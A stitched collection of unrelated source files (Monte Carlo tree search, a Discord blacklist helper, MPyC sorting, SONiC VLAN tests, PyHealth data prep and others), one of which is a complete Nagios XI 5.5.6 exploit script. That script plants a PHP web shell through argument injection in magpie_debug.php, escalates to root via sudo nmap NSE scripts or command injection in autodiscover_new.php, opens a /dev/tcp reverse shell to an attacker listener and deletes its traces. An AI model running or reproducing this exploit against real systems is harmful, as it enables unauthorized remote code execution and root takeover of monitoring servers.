if last_state_key in self.nodes:
last_node = self.nodes[last_state_key]
else:
last_node = TreeNode(states[-1])
self.nodes[last_state_key] = last_node
# Simulation phase
for try_count in range(self.max_tries):
sim_states = states.copy()
sim_actions = actions.copy()
action = self.select_action(sim_states[-1])
while action is not None:
sim_states.append(self.env.get_next_state(sim_states[-1], action))
sim_actions.append(action)
action = self.select_action(sim_states[-1])
result = self.env.get_result(sim_states[-1])
if result is not None:
# Result is valid
break
if result is None:
# No valid simulation after max_tries tries, block the last node
# Next loop iteration will select a different node
last_node.blocked = True
print("Blocked node:", [self.env.rules.index(rule) for rule in last_node.state[1]])
# Backpropagation phase
for i, state in enumerate(sim_states[:-1]):
actions_after = sim_actions[i:]
try:
node = self.nodes[self.env.get_key(state)]
self.update_node(node, actions_after, result)
except KeyError:
pass
return sim_states, sim_actions, result
|
helpers/json_manager.py | xxopcode90xx/DiscordChatBotProject | 491 | 12748030 | <gh_stars>100-1000
import json
def add_user_to_blacklist(user_id: int):
with open("blacklist.json", "r+") as file:
file_data = json.load(file)
file_data["ids"].append(user_id)
with open("blacklist.json", "w") as file:
file.seek(0)
json.dump(file_data, file, indent=4)
def remove_user_from_blacklist(user_id: int):
with open("blacklist.json", "r") as file:
file_data = json.load(file)
file_data["ids"].remove(user_id)
with open("blacklist.json", "w") as file:
file.seek(0)
json.dump(file_data, file, indent=4)
|
demos/sort.py | bahmanahmadi/mpyc | 232 | 12748049 | <reponame>bahmanahmadi/mpyc
"""Demo oblivious sorting in MPyC, with full secrecy.
Randomly generated secret-shared lists of numbers (integers or fixed-point numbers)
are sorted using MPyC's built-in functions mcp.sorted() and seclist.sort(),
which are the secure counterparts of Python's built-in function sorted() and
list.sort(), respectively.
"""
import sys
from mpyc.runtime import mpc
from mpyc.seclists import seclist
async def main():
if sys.argv[1:]:
n = int(sys.argv[1])
else:
n = 5
print('Setting input to default =', n)
s = [(-1)**i * (i + n//2)**2 for i in range(n)]
secnum = mpc.SecInt()
print('Using secure integers:', secnum)
x = list(map(secnum, s))
async with mpc:
mpc.random.shuffle(secnum, x) # secret in-place random shuffle
print('Randomly shuffled input:', await mpc.output(x))
x = mpc.sorted(x, key=lambda a: a**2) # sort on absolute value
print('Sorted by absolute value:', await mpc.output(x))
secnum = mpc.SecFxp()
print('Using secure fixed-point numbers:', secnum)
x = list(map(secnum, s))
async with mpc:
mpc.random.shuffle(secnum, x) # secret in-place random shuffle
print('Randomly shuffled input:', await mpc.output(x))
x = seclist(x)
x.sort(reverse=True) # in-place sort in descending order
print('Sorted by descending value:', await mpc.output(list(x)))
if __name__ == '__main__':
mpc.run(main())
|
examples/host_external_norestart.py | virtualgod/python-sc2 | 621 | 12748051 | import argparse
import sys
import asyncio
import sc2
from sc2 import Race
from sc2.player import Bot
from zerg.zerg_rush import ZergRushBot
def main():
portconfig = sc2.portconfig.Portconfig()
print(portconfig.as_json)
player_config = [
Bot(Race.Zerg, ZergRushBot()),
Bot(Race.Zerg, None)
]
for g in sc2.main._host_game_iter(
sc2.maps.get("Abyssal Reef LE"),
player_config,
realtime=False,
portconfig=portconfig
):
print(g)
if __name__ == "__main__":
main()
|
bpycv/physic_utils.py | TheShadow29/bpycv | 248 | 12748067 | <filename>bpycv/physic_utils.py
#!/usr/bin/env python3
import bpy
import mathutils
from .object_utils import activate_obj
SET_ORIGIN_HOOK_NAME = "set_back_origin"
OLD_V0_KEY = "old_object.data.vertices[0].co"
def set_origin_and_record_old_v0(obj, type="ORIGIN_CENTER_OF_VOLUME", center="MEDIAN"):
obj[OLD_V0_KEY] = obj.data.vertices[0].co.copy()
with activate_obj(obj):
bpy.ops.object.origin_set(type=type, center=center)
def set_origin_by_vector(obj, new_origin_vector):
return set_origin_by_point(
obj, obj.matrix_world.to_translation() + new_origin_vector
)
def set_origin_by_point(obj, point):
"""
Not work when bpy.context.scene.frame_curren != 1
"""
cursor_mat = bpy.context.scene.cursor.matrix.copy()
bpy.context.scene.cursor.rotation_euler = 0, 0, 0
bpy.context.scene.cursor.location = point
with activate_obj(obj):
bpy.ops.object.origin_set(type="ORIGIN_CURSOR", center="MEDIAN")
bpy.context.scene.cursor.matrix = cursor_mat
return obj
if __name__ == "__main__":
pass
|
android_env/components/adb_log_stream.py | yjaeseok/android_env | 768 | 12748096 | # coding=utf-8
# Copyright 2021 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class for a stream of logs output by a locally running emulator."""
import subprocess
from typing import List
from android_env.components import log_stream
_LOGCAT_COMMAND = ['logcat', '-v', 'epoch']
class AdbLogStream(log_stream.LogStream):
"""Manages adb logcat process for a locally running emulator."""
def __init__(self, adb_command_prefix: List[str], *args, **kwargs):
super().__init__(*args, **kwargs)
self._adb_command_prefix = adb_command_prefix
def _get_stream_output(self):
cmd = self._adb_command_prefix + _LOGCAT_COMMAND + self._filters
self._adb_subprocess = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
bufsize=1,
universal_newlines=True)
return self._adb_subprocess.stdout
def stop_stream(self):
self._adb_subprocess.kill()
|
src/pretix/plugins/statistics/signals.py | fabm3n/pretix | 1,248 | 12748109 | <gh_stars>1000+
#
# This file is part of pretix (Community Edition).
#
# Copyright (C) 2014-2020 <NAME> and contributors
# Copyright (C) 2020-2021 rami.io GmbH and contributors
#
# This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General
# Public License as published by the Free Software Foundation in version 3 of the License.
#
# ADDITIONAL TERMS APPLY: Pursuant to Section 7 of the GNU Affero General Public License, additional terms are
# applicable granting you additional permissions and placing additional restrictions on your usage of this software.
# Please refer to the pretix LICENSE file to obtain the full terms applicable to this work. If you did not receive
# this file, see <https://pretix.eu/about/en/license>.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
# details.
#
# You should have received a copy of the GNU Affero General Public License along with this program. If not, see
# <https://www.gnu.org/licenses/>.
#
from django.dispatch import receiver
from django.urls import resolve, reverse
from django.utils.translation import gettext_lazy as _
from pretix.base.signals import order_paid, order_placed
from pretix.control.signals import nav_event
@receiver(nav_event, dispatch_uid="statistics_nav")
def control_nav_import(sender, request=None, **kwargs):
url = resolve(request.path_info)
if not request.user.has_event_permission(request.organizer, request.event, 'can_view_orders', request=request):
return []
return [
{
'label': _('Statistics'),
'url': reverse('plugins:statistics:index', kwargs={
'event': request.event.slug,
'organizer': request.event.organizer.slug,
}),
'parent': reverse('control:event.orders', kwargs={
'event': request.event.slug,
'organizer': request.event.organizer.slug,
}),
'active': (url.namespace == 'plugins:statistics'),
'icon': 'bar-chart',
}
]
def clear_cache(sender, *args, **kwargs):
cache = sender.cache
cache.delete('statistics_obd_data')
cache.delete('statistics_obp_data')
cache.delete('statistics_rev_data')
order_placed.connect(clear_cache)
order_paid.connect(clear_cache)
|
asv/commands/rm.py | jaimergp/asv | 476 | 12748115 | # -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import six
from fnmatch import fnmatchcase
import sys
from . import Command
from .. import console
from ..console import log
from ..results import iter_results
from . import util
class Rm(Command):
@classmethod
def setup_arguments(cls, subparsers):
parser = subparsers.add_parser(
"rm", help="Remove results from the database",
description="""
Removes entries from the results database.
""")
parser.add_argument(
'patterns', nargs='+',
help="""Pattern(s) to match, each of the form X=Y. X may
be one of "benchmark", "commit_hash", "python" or any of
the machine or environment params. Y is a case-sensitive
glob pattern.""")
parser.add_argument(
"-y", action="store_true",
help="""Don't prompt for confirmation.""")
parser.set_defaults(func=cls.run_from_args)
return parser
@classmethod
def run_from_conf_args(cls, conf, args):
return cls.run(conf, args.patterns, args.y)
@classmethod
def run(cls, conf, patterns, y=True):
global_patterns = {}
single_benchmark = None
files_to_remove = set()
count = 0
for pattern in patterns:
parts = pattern.split('=', 1)
if len(parts) != 2:
raise util.UserError("Invalid pattern '{0}'".format(pattern))
if parts[0] == 'benchmark':
if single_benchmark is not None:
raise util.UserError("'benchmark' appears more than once")
single_benchmark = parts[1]
else:
if parts[0] in global_patterns:
raise util.UserError(
"'{0}' appears more than once".format(parts[0]))
global_patterns[parts[0]] = parts[1]
for result in iter_results(conf.results_dir):
found = True
for key, val in six.iteritems(global_patterns):
if key == 'commit_hash':
if not util.hash_equal(result.commit_hash, val):
found = False
break
elif key == 'python':
if not fnmatchcase(result.env.python, val):
found = False
break
else:
if not fnmatchcase(result.params.get(key), val):
found = False
break
if not found:
continue
if single_benchmark is not None:
found = False
for benchmark in list(result.get_all_result_keys()):
if fnmatchcase(benchmark, single_benchmark):
count += 1
files_to_remove.add(result)
result.remove_result(benchmark)
else:
files_to_remove.add(result)
if single_benchmark is not None:
log.info("Removing {0} benchmarks in {1} files".format(
count, len(files_to_remove)))
else:
log.info("Removing {0} files".format(len(files_to_remove)))
if not y:
do = console.get_answer_default("Perform operations", "n")
if len(do) and do.lower()[0] != 'y':
sys.exit(0)
if single_benchmark is not None:
for result in files_to_remove:
result.save(conf.results_dir)
else:
for result in files_to_remove:
result.rm(conf.results_dir)
|
ansible/roles/test/files/ptftests/vlan_test.py | shubav/sonic-mgmt | 132 | 12748133 | <gh_stars>100-1000
import ast
import json
import logging
import subprocess
from collections import defaultdict
from ipaddress import ip_address, ip_network
import ptf
import ptf.packet as scapy
import ptf.dataplane as dataplane
from ptf import config
from ptf.base_tests import BaseTest
from ptf.testutils import *
from ptf.mask import Mask
class VlanTest(BaseTest):
def __init__(self):
BaseTest.__init__(self)
self.test_params = test_params_get()
#--------------------------------------------------------------------------
def log(self, message):
logging.info(message)
#--------------------------------------------------------------------------
def shell(self, cmds):
sp = subprocess.Popen(cmds, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = sp.communicate()
rc = sp.returncode
return stdout, stderr, rc
#--------------------------------------------------------------------------
def setUp(self):
self.vlan_ports_list = ast.literal_eval(self.test_params["vlan_ports_list"])
self.vlan_intf_list = ast.literal_eval(self.test_params["vlan_intf_list"])
self.router_mac = self.test_params["router_mac"]
for vlan_port in self.vlan_ports_list:
vlan_port["pvid"] = int(vlan_port["pvid"])
vlan_port["port_index"] = int(vlan_port["port_index"])
self.dataplane = ptf.dataplane_instance
self.test_params = test_params_get()
self.log("Create VLAN intf")
for vlan_port in self.vlan_ports_list:
for permit_vlanid in vlan_port["permit_vlanid"].keys():
if int(permit_vlanid) != vlan_port["pvid"]:
self.shell(["ip", "link", "add", "link", "eth%d"%vlan_port["port_index"],
"name", "eth%d.%s"%(vlan_port["port_index"], permit_vlanid),
"type", "vlan", "id", str(permit_vlanid)])
self.shell(["ip", "link", "set",
"eth%d.%s"%(vlan_port["port_index"], permit_vlanid), "up"])
self.setUpArpResponder()
self.log("Start arp_responder")
self.shell(["supervisorctl", "start", "arp_responder"])
logging.info("VLAN test starting ...")
pass
#--------------------------------------------------------------------------
def setUpArpResponder(self):
vlan_ports_list = self.vlan_ports_list
d = defaultdict(list)
for vlan_port in vlan_ports_list:
for permit_vlanid in vlan_port["permit_vlanid"].keys():
if int(permit_vlanid) == vlan_port["pvid"]:
iface = "eth%d" % vlan_port["port_index"]
else:
iface = "eth%d.%s" % (vlan_port["port_index"], permit_vlanid)
d[iface].append(vlan_port["permit_vlanid"][str(permit_vlanid)]["peer_ip"])
with open('/tmp/from_t1.json', 'w') as file:
json.dump(d, file)
#--------------------------------------------------------------------------
def tearDown(self):
logging.info("VLAN test ending ...")
self.log("Stop arp_responder")
self.shell(["supervisorctl", "stop", "arp_responder"])
self.log("Delete VLAN intf")
for vlan_port in self.vlan_ports_list:
for permit_vlanid in vlan_port["permit_vlanid"].keys():
if int(permit_vlanid) != vlan_port["pvid"]:
self.shell(["ip", "link", "delete", "eth%d.%d"%(vlan_port["port_index"], int(permit_vlanid))])
pass
#--------------------------------------------------------------------------
def build_icmp_packet(self, vlan_id,
src_mac="00:22:00:00:00:02", dst_mac="ff:ff:ff:ff:ff:ff",
src_ip="192.168.0.1", dst_ip="192.168.0.2", ttl=64):
pkt = simple_icmp_packet(pktlen=100 if vlan_id == 0 else 104,
eth_dst=dst_mac,
eth_src=src_mac,
dl_vlan_enable=False if vlan_id == 0 else True,
vlan_vid=vlan_id,
vlan_pcp=0,
ip_src=src_ip,
ip_dst=dst_ip,
ip_ttl=ttl)
return pkt
#--------------------------------------------------------------------------
def verify_icmp_packets(self, vlan_port, vlan_id):
untagged_dst_ports = []
tagged_dst_ports = []
untagged_pkts = []
tagged_pkts = []
untagged_pkt = self.build_icmp_packet(0)
tagged_pkt = self.build_icmp_packet(vlan_id)
for port in self.vlan_ports_list:
if vlan_port["port_index"] == port["port_index"]:
# Skip src port
continue
if port["pvid"] == vlan_id:
untagged_dst_ports.append(port["port_index"])
untagged_pkts.append(untagged_pkt)
elif vlan_id in map(int, port["permit_vlanid"].keys()):
tagged_dst_ports.append(port["port_index"])
tagged_pkts.append(tagged_pkt)
self.log("Verify untagged packets from ports " + str(untagged_dst_ports) + " tagged packets from ports " + str(tagged_dst_ports))
verify_each_packet_on_each_port(self, untagged_pkts+tagged_pkts, untagged_dst_ports+tagged_dst_ports)
#--------------------------------------------------------------------------
def verify_icmp_packets_from_specified_port(self, port_id, vlan_id, src_mac, dst_mac, src_ip, dst_ip, ttl):
self.log("Verify packet from port " + str(port_id))
pkt = self.build_icmp_packet(vlan_id, src_mac, dst_mac, src_ip, dst_ip, ttl)
verify_packet(self, pkt, port_id)
#--------------------------------------------------------------------------
def runTest(self):
vlan_ports_list = self.vlan_ports_list
vlan_intf_list = self.vlan_intf_list
# Test case #1
self.log("Test case #1 starting ...")
# Send untagged packets from each port.
# Verify packets egress without tag from ports whose PVID same with ingress port
# Verify packets egress with tag from ports who include VLAN ID but PVID different from ingress port.
for vlan_port in vlan_ports_list:
pkt = self.build_icmp_packet(0)
self.log("Send untagged packet from {} ...".format(str(vlan_port["port_index"])))
self.log(pkt.sprintf("%Ether.src% %IP.src% -> %Ether.dst% %IP.dst%"))
send(self, vlan_port["port_index"], pkt)
self.verify_icmp_packets(vlan_port, vlan_port["pvid"])
# Test case #2
self.log("Test case #2 starting ...")
# Send tagged packets from each port.
# Verify packets egress without tag from ports whose PVID same with ingress port
# Verify packets egress with tag from ports who include VLAN ID but PVID different from ingress port.
for vlan_port in vlan_ports_list:
for permit_vlanid in map(int, vlan_port["permit_vlanid"].keys()):
pkt = self.build_icmp_packet(permit_vlanid)
self.log("Send tagged({}) packet from {} ...".format(permit_vlanid, str(vlan_port["port_index"])))
self.log(pkt.sprintf("%Ether.src% %IP.src% -> %Ether.dst% %IP.dst%"))
send(self, vlan_port["port_index"], pkt)
self.verify_icmp_packets(vlan_port, permit_vlanid)
# Test case #3
# Send packets with invalid VLAN ID
# Verify no port can receive these pacekts
self.log("Test case #3 starting ...")
invalid_tagged_pkt = self.build_icmp_packet(4095)
masked_invalid_tagged_pkt = Mask(invalid_tagged_pkt)
masked_invalid_tagged_pkt.set_do_not_care_scapy(scapy.Dot1Q, "vlan")
for vlan_port in vlan_ports_list:
src_port = vlan_port["port_index"]
dst_ports = [port["port_index"] for port in vlan_ports_list
if port != vlan_port ]
self.log("Send invalid tagged packet " + " from " + str(src_port) + "...")
self.log(invalid_tagged_pkt.sprintf("%Ether.src% %IP.src% -> %Ether.dst% %IP.dst%"))
send(self, src_port, invalid_tagged_pkt)
self.log("Check on " + str(dst_ports) + "...")
verify_no_packet_any(self, masked_invalid_tagged_pkt, dst_ports)
# Test case #4
# Send packets over VLAN interfaces.
# Verify packets can be receive on the egress port.
self.log("Test case #4 starting ...")
target_list = []
for vlan_port in vlan_ports_list:
for vlan_id in vlan_port["permit_vlanid"].keys():
item = {"vlan_id": int(vlan_id), "port_index": vlan_port["port_index"],
"peer_ip": vlan_port["permit_vlanid"][vlan_id]["peer_ip"],
"remote_ip": vlan_port["permit_vlanid"][vlan_id]["remote_ip"],
"pvid": vlan_port["pvid"]}
target_list.append(item)
for vlan_port in vlan_ports_list:
src_port = vlan_port["port_index"]
src_mac = self.dataplane.get_mac(0, src_port)
dst_mac = self.router_mac
for vlan_id in map(int, vlan_port["permit_vlanid"].keys()):
# Test for for directly-connected routing
src_ip = vlan_port["permit_vlanid"][str(vlan_id)]["peer_ip"]
for target in target_list:
if vlan_id == target["vlan_id"]:
# Skip same VLAN forwarding
continue
pkt = self.build_icmp_packet(vlan_id if vlan_id != vlan_port["pvid"] else 0,
src_mac, dst_mac, src_ip, target["peer_ip"])
send(self, src_port, pkt)
self.log("Send {} packet from {} ...".format("untagged" if vlan_id == 0 else "tagged(%d)"%vlan_id, src_port))
self.log(pkt.sprintf("%Ether.src% %IP.src% -> %Ether.dst% %IP.dst%"))
self.verify_icmp_packets_from_specified_port(target["port_index"],
target["vlan_id"] if target["vlan_id"] != target["pvid"] else 0,
dst_mac, self.dataplane.get_mac(0, target["port_index"]),
src_ip, target["peer_ip"], 63)
# Test for for indirectly-connected routing
src_ip = vlan_port["permit_vlanid"][str(vlan_id)]["remote_ip"]
for target in target_list:
if vlan_id == target["vlan_id"]:
# Skip same VLAN forwarding
continue
pkt = self.build_icmp_packet(vlan_id if vlan_id != vlan_port["pvid"] else 0,
src_mac, dst_mac, src_ip, target["remote_ip"])
self.log("Send {} packet from {} ...".format("untagged" if vlan_id == 0 else "tagged(%d)"%vlan_id, src_port))
self.log(pkt.sprintf("%Ether.src% %IP.src% -> %Ether.dst% %IP.dst%"))
send(self, src_port, pkt)
self.verify_icmp_packets_from_specified_port(target["port_index"],
target["vlan_id"] if target["vlan_id"] != target["pvid"] else 0,
dst_mac, self.dataplane.get_mac(0, target["port_index"]),
src_ip, target["remote_ip"], 63)
# Test case #5
# Send ICMP packets to VLAN interfaces.
# Verify ICMP reply packets can be received from ingress port.
self.log("Test case #5 starting ...")
for vlan_port in vlan_ports_list:
src_port = vlan_port["port_index"]
src_mac = self.dataplane.get_mac(0, src_port)
dst_mac = self.router_mac
for vlan_id in map(int, vlan_port["permit_vlanid"].keys()):
src_ip = vlan_port["permit_vlanid"][str(vlan_id)]["peer_ip"]
for vlan_intf in vlan_intf_list:
if int(vlan_intf["vlan_id"]) != vlan_id:
continue
dst_ip = vlan_intf["ip"].split("/")[0]
pkt = self.build_icmp_packet(vlan_id if vlan_id != vlan_port["pvid"] else 0,
src_mac, dst_mac, src_ip, dst_ip)
self.log("Send {} packet from {} ...".format("untagged" if vlan_id == 0 else "tagged(%d)"%vlan_id, src_port))
self.log(pkt.sprintf("%Ether.src% %IP.src% -> %Ether.dst% %IP.dst%"))
send(self, src_port, pkt)
exp_pkt = simple_icmp_packet(eth_src=self.router_mac,
eth_dst=src_mac,
dl_vlan_enable=True if vlan_id != vlan_port["pvid"] else False,
vlan_vid=vlan_id if vlan_id != vlan_port["pvid"] else 0,
vlan_pcp=0,
ip_dst=src_ip,
ip_src=dst_ip,
icmp_type=0,
icmp_code=0)
masked_exp_pkt = Mask(exp_pkt)
masked_exp_pkt.set_do_not_care_scapy(scapy.IP, "id")
verify_packets(self, masked_exp_pkt, list(str(src_port)))
self.log("Verify packet from port " + str(src_port))
#--------------------------------------------------------------------------
|
nagios/nagiosxi_556_rce_lpe.py | iamarkaj/poc | 1,007 | 12748135 | from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
import SocketServer, threading, ssl
import requests, urllib
import sys, os, argparse
from OpenSSL import crypto
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# https://www.tenable.com/security/research/tra-2018-37
#
# This code exploits both CVE-2018-15708 and CVE-2018-15710 to pop root a shell.
# It has been tested against Nagios XI 2012r1.0, 5r1.0, and 5.5.6.
TIMEOUT = 5 # sec
def err_and_exit(msg):
print '\n\nERROR: ' + msg + '\n\n'
sys.exit(1)
# handle sending a get request
def http_get_quiet(url):
try:
r = requests.get(url, timeout=TIMEOUT, verify=False)
except requests.exceptions.ReadTimeout:
err_and_exit("Request to '" + url + "' timed out.")
else:
return r
# 200?
def url_ok(url):
r = http_get_quiet(url)
return (r.status_code == 200)
# run a shell command using the PHP file we uploaded
def send_shell_cmd(path, cmd):
querystr = { 'cmd' : cmd }
# e.g. http://blah/exec.php?cmd=whoami
url = path + '?' + urllib.urlencode(querystr)
return http_get_quiet(url)
# delete some files locally and on the Nagios XI instance
def clean_up(remote, paths, exec_path=None):
if remote:
for path in paths:
send_shell_cmd(exec_path, 'rm ' + path)
print 'Removing remote file ' + path
else:
for path in paths:
os.remove(path)
print 'Removing local file ' + path
# Thanks http://django-notes.blogspot.com/2012/02/generating-self-signed-ssl-certificate.html
def generate_self_signed_cert(cert_dir, cert_file, key_file):
"""Generate a SSL certificate.
If the cert_path and the key_path are present they will be overwritten.
"""
if not os.path.exists(cert_dir):
os.makedirs(cert_dir)
cert_path = os.path.join(cert_dir, cert_file)
key_path = os.path.join(cert_dir, key_file)
if os.path.exists(cert_path):
os.unlink(cert_path)
if os.path.exists(key_path):
os.unlink(key_path)
# create a key pair
key = crypto.PKey()
key.generate_key(crypto.TYPE_RSA, 1024)
# create a self-signed cert
cert = crypto.X509()
cert.get_subject().C = 'US'
cert.get_subject().ST = 'Lorem'
cert.get_subject().L = 'Ipsum'
cert.get_subject().O = 'Lorem'
cert.get_subject().OU = 'Ipsum'
cert.get_subject().CN = 'Unknown'
cert.set_serial_number(1000)
cert.gmtime_adj_notBefore(0)
cert.gmtime_adj_notAfter(10 * 365 * 24 * 60 * 60)
cert.set_issuer(cert.get_subject())
cert.set_pubkey(key)
cert.sign(key, 'sha1')
with open(cert_path, 'wt') as fd:
fd.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
with open(key_path, 'wt') as fd:
fd.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key))
return cert_path, key_path
# HTTP request handler
class MyHTTPD(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
msg = '<?php system($_GET[\'cmd\']); ?>' # this will be written to the PHP file
self.end_headers()
self.wfile.write(str.encode(msg))
# Make the http listener operate on its own thread
class ThreadedWebHandler(object):
def __init__(self, host, port, keyfile, certfile):
self.server = SocketServer.TCPServer((host, port), MyHTTPD)
self.server.socket = ssl.wrap_socket(
self.server.socket,
keyfile=keyfile,
certfile=certfile,
server_side=True
)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
def start(self):
self.server_thread.start()
def stop(self):
self.server.shutdown()
self.server.server_close()
##### MAIN #####
desc = 'Nagios XI 5.5.6 MagpieRSS Remote Code Execution and Privilege Escalation'
arg_parser = argparse.ArgumentParser(description=desc)
arg_parser.add_argument('-t', required=True, help='Nagios XI IP Address (Required)')
arg_parser.add_argument('-ip', required=True, help='HTTP listener IP')
arg_parser.add_argument('-port', type=int, default=9999, help='HTTP listener port (Default: 9999)')
arg_parser.add_argument('-ncip', required=True, help='Netcat listener IP')
arg_parser.add_argument('-ncport', type=int, default=4444, help='Netcat listener port (Default: 4444)')
args = arg_parser.parse_args()
# Nagios XI target settings
target = { 'ip' : args.t }
# listener settings
listener = {
'ip' : args.ip,
'port' : args.port,
'ncip' : args.ncip,
'ncport': args.ncport
}
# generate self-signed cert
cert_file = 'cert.crt'
key_file = 'key.key'
generate_self_signed_cert('./', cert_file, key_file)
# start threaded listener
# thanks http://brahmlower.io/threaded-http-server.html
server = ThreadedWebHandler(listener['ip'], listener['port'], key_file, cert_file)
server.start()
print "\nListening on " + listener['ip'] + ":" + str(listener['port'])
# path to Nagios XI app
base_url = 'https://' + target['ip']
# ensure magpie_debug.php exists
magpie_url = base_url + '/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php'
if not url_ok(magpie_url):
err_and_exit('magpie_debug.php not found.')
print '\nFound magpie_debug.php.\n'
exec_path = None # path to exec.php in URL
cleanup_paths = [] # local path on Nagios XI filesystem to clean up
# ( local fs path : url path )
paths = [
( '/usr/local/nagvis/share/', '/nagvis' ),
( '/var/www/html/nagiosql/', '/nagiosql' )
]
# inject argument to create exec.php
# try multiple directories if necessary. dir will be different based on nagios xi version
filename = 'exec.php'
for path in paths:
local_path = path[0] + filename # on fs
url = 'https://' + listener['ip'] + ':' + str(listener['port']) + '/%20-o%20' + local_path # e.g. https://192.168.1.191:8080/%20-o%20/var/www/html/nagiosql/exec.php
url = magpie_url + '?url=' + url
print 'magpie url = ' + url
r = http_get_quiet(url)
# ensure php file was created
exec_url = base_url + path[1] + '/' + filename # e.g. https://192.168.1.192/nagiosql/exec.php
if url_ok(exec_url):
exec_path = exec_url
cleanup_paths.append(local_path)
break
# otherwise, try the next path
if exec_path is None:
err_and_exit('Couldn\'t create PHP file.')
print '\n' + filename + ' written. Visit ' + exec_url + '\n'
# run a few commands to display status to user
print 'Gathering some basic info...'
cmds = [
('whoami', 'Current User'),
("cat /usr/local/nagiosxi/var/xiversion | grep full | cut -d '=' -f 2", 'Nagios XI Version')
]
for cmd in cmds:
r = send_shell_cmd(exec_url, cmd[0])
sys.stdout.write('\t' + cmd[1] + ' => ' + r.text)
# candidates for privilege escalation
# depends on Nagios XI version
rev_bash_shell = '/bin/bash -i >& /dev/tcp/' + listener['ncip'] + '/' + str(listener['ncport']) + ' 0>&1'
# tuple contains (shell command, cleanup path)
priv_esc_list = [
("echo 'os.execute(\"" + rev_bash_shell + "\")' > /var/tmp/shell.nse && sudo nmap --script /var/tmp/shell.nse", '/var/tmp/shell.nse'),
("sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/1`" + rev_bash_shell + "`'", None)
]
# escalate privileges and launch the connect-back shell
timed_out = False
for priv_esc in priv_esc_list:
try:
querystr = { 'cmd' : priv_esc[0] }
url = exec_path + '?' + urllib.urlencode(querystr)
r = requests.get(url, timeout=TIMEOUT, verify=False)
print '\nTrying to escalate privs with url: ' + url
except requests.exceptions.ReadTimeout:
timed_out = True
if priv_esc[1] is not None:
cleanup_paths.append(priv_esc[1])
break
if timed_out:
print 'Check for a shell!!\n'
else:
print 'Not so sure it worked...\n'
server.stop()
# clean up files we created
clean_up(True, cleanup_paths, exec_path) # remote files
clean_up(False, [cert_file, key_file])
|
pyhealth/data/expdata_generator.py | Abhinav43/PyHealth | 485 | 12748155 | <filename>pyhealth/data/expdata_generator.py
# -*- coding: utf-8 -*-
# Author: <NAME> <<EMAIL>>
# License: BSD 2 clause
import os
import csv
import pickle
import random
import numpy as np
import pandas as pd
import tqdm
from tqdm._tqdm import trange
import time
try:
from ..utils.check import *
except:
from pyhealth.utils.check import *
class imagedata:
def __init__(self, expdata_id, root_dir='.'):
"""
experiment data generat class for cms datasets
Parameters
----------
exp_id : str, optional (default='init.test')
name of current experiment
"""
self.expdata_id = expdata_id
check_expdata_dir(expdata_id = expdata_id)
self.root_dir = root_dir
self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id)
print(
'Current ExpData_ID: {0} --- Target for CMS'.format(
self.expdata_id))
def get_exp_data(self,
sel_task='diagnose',
shuffle=True,
split_ratio=[0.64, 0.16, 0.2],
data_root = '',
n_limit = -1):
"""
Parameters
----------
task : str, optional (default='phenotyping')
name of current healthcare task
shuffle : bool, optional (default=True)
determine whether shuffle data or not
split_ratio : list, optional (default=[0.64,0.16,0.2])
used for split whole data into train/valid/test
data_root : str, (default='')
use data in data_root
n_limit : int, optional (default = -1)
used for sample N-data not for all data, if n_limit==-1, use all data
"""
self.sel_task = sel_task
if data_root == '':
raise Exception('fill in correct data_root')
all_list = []
l_list = []
episode_dir = os.path.join(data_root, 'x_data')
feat_n, label_n = 0, 0
label_seq = pd.read_csv(os.path.join(data_root, 'y_data',
self.sel_task + '.csv')).values
for row_id in trange(len(label_seq)):
if n_limit>0 and row_id>n_limit:
break
time.sleep(0.01)
row = label_seq[row_id, :]
concrete_path = os.path.join(episode_dir, row[0])
if os.path.exists(concrete_path) is False:
continue
all_list.append([concrete_path] + row[1:].astype(float).tolist())
label_n = len(row[1:])
# shuffle the list
if shuffle:
random.shuffle(all_list)
N = len(all_list)
x_list = []
y_list = []
for item in all_list:
x_list.append(item[0])
y_list.append(np.array(item[1:]).astype(float))
train_ratio = split_ratio[0]
valid_ratio = split_ratio[1]
training_x = x_list[: int(train_ratio * N)]
validing_x = x_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_x = x_list[int((train_ratio + valid_ratio) * N):]
training_y = y_list[: int(train_ratio * N)]
validing_y = y_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_y = y_list[int((train_ratio + valid_ratio) * N):]
if os.path.exists(self.expdata_dir) is False:
os.makedirs(self.expdata_dir)
pickle.dump(training_x, open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'wb'))
pickle.dump(validing_x, open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'wb'))
pickle.dump(testing_x, open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'wb'))
print ('finished X generate')
pickle.dump(training_y, open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'wb'))
pickle.dump(validing_y, open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'wb'))
pickle.dump(testing_y, open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'wb'))
print ('finished Y generate')
